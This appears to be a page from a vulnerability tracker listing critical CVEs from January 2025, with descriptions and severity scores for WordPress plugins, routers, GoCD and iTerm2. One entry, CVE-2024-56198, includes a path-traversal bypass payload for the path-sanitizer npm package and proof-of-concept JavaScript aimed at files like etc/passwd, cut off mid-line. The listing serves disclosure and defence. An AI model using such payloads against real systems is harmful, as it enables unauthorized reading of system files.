CVE-2024-48956 |
Description: Serviceware Processes 6.0 through 7.3 before 7.4 allows attackers without valid authentication to send a specially crafted HTTP request to a service endpoint resulting in remote code execution.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 7th, 2025 (3 months ago)
|
CVE-2024-12583 |
Description: The Dynamics 365 Integration plugin for WordPress is vulnerable to Remote Code Execution and Arbitrary File Read in all versions up to, and including, 1.3.23 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.
CVSS: CRITICAL (9.9) EPSS Score: 0.06%
January 5th, 2025 (4 months ago)
|
CVE-2025-22275 |
Description: iTerm2 3.5.6 through 3.5.10 before 3.5.11 sometimes allows remote attackers to obtain sensitive information from terminal commands by reading the /tmp/framer.txt file. This can occur for certain it2ssh and SSH Integration configurations, during remote logins to hosts that have a common Python installation.
CVSS: CRITICAL (9.3) EPSS Score: 0.05%
January 4th, 2025 (4 months ago)
|
CVE-2024-9140 |
Description: Moxa’s cellular routers, secure routers, and network security appliances are affected by a critical vulnerability, CVE-2024-9140. This vulnerability allows OS command injection due to improperly restricted commands, potentially enabling attackers to execute arbitrary code. This poses a significant risk to the system’s security and functionality.
CVSS: CRITICAL (9.3) EPSS Score: 0.04%
January 4th, 2025 (4 months ago)
|
CVE-2024-56320 |
Description: GoCD is a continuous delivery server. GoCD versions prior to 24.5.0 are vulnerable to admin privilege escalation due to improper authorization of access to the admin "Configuration XML" UI feature, and its associated API. A malicious insider/existing authenticated GoCD user with an existing GoCD user account could abuse this vulnerability to access information intended only for GoCD admins, or to escalate their privileges to that of a GoCD admin in a persistent manner. It is not possible for this vulnerability to be abused prior to authentication/login. The issue is fixed in GoCD 24.5.0. GoCD users who are not able to immediately upgrade can mitigate this issue by using a reverse proxy, WAF or similar to externally block access paths with a `/go/rails/` prefix. Blocking this route causes no loss of functionality. If it is not possible to upgrade or block the above route, consider reducing the GoCD user base to a more trusted set of users, including temporarily disabling use of plugins such as the guest-login-plugin, which allow limited anonymous access as a regular user account.
CVSS: CRITICAL (9.4) EPSS Score: 0.05%
January 4th, 2025 (4 months ago)
|
CVE-2024-56829 |
Description: Huang Yaoshi Pharmaceutical Management Software through 16.0 allows arbitrary file upload via a .asp filename in the fileName element of the UploadFile element in a SOAP request to /XSDService.asmx.
CVSS: CRITICAL (10.0) EPSS Score: 0.04%
January 3rd, 2025 (4 months ago)
|
CVE-2024-56249 |
Description: Unrestricted Upload of File with Dangerous Type vulnerability in Webdeclic WPMasterToolKit allows Upload a Web Shell to a Web Server. This issue affects WPMasterToolKit: from n/a through 1.13.1.
CVSS: CRITICAL (9.1) EPSS Score: 0.04%
January 3rd, 2025 (4 months ago)
|
CVE-2024-56198 |
Description: Summary
This is a POC for a path-sanitizer npm package. The filters can be bypassed and can result in path traversal.
Payload: ..=%5c can be used to bypass this on CLI (along with other candidates). Something similar would likely work on web apps as well.
PoC
Here's the code to test for the filter bypass:
```javascript
const sanitize = require("path-sanitizer")
const path = require("path")
const fs = require("fs")

// Real scenario:
function routeHandler(myPath) {
  // Let's just assume that the path was extracted from the request
  // We want to read a file in the C:\Users\user\Desktop\myApp\ directory
  // But the user should be able to access C:\Users\user\Desktop\
  // So we need to sanitize the path
  const APP_DIR = "/var/hacker"
  const sanitized = path.join(APP_DIR, sanitize(myPath))
  // Now we would usually read the file
  // But in this case we are just going to print the path
  // console.log(sanitized)
  return sanitized
}

function readFile(filePath) {
  const absolutePath = path.resolve(filePath) // Resolve to absolute path
  fs.readFile(absolutePath, "utf8", (err, data) => {
    if (err) {
      console.error(`Error reading the file: ${err.message}`)
      return
    }
    console.log(`Contents of the file ${filePath} :\n${data}`)
  })
}

const input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt"
// input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd"
const input_user_payload = "../../../../../../../../tmp/hacked.txt"
readFile(routeHandler...
```
CVSS: CRITICAL (9.3) EPSS Score: 0.05%
January 2nd, 2025 (4 months ago)
|
CVE-2024-56220 |
Description: Incorrect Privilege Assignment vulnerability in SSL Wireless SSL Wireless SMS Notification allows Privilege Escalation. This issue affects SSL Wireless SMS Notification: from n/a through 3.5.0.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 1st, 2025 (4 months ago)
|
CVE-2024-56205 |
Description: Incorrect Privilege Assignment vulnerability in AI Magic allows Privilege Escalation. This issue affects AI Magic: from n/a through 1.0.4.
CVSS: CRITICAL (9.8) EPSS Score: 0.04%
January 1st, 2025 (4 months ago)
|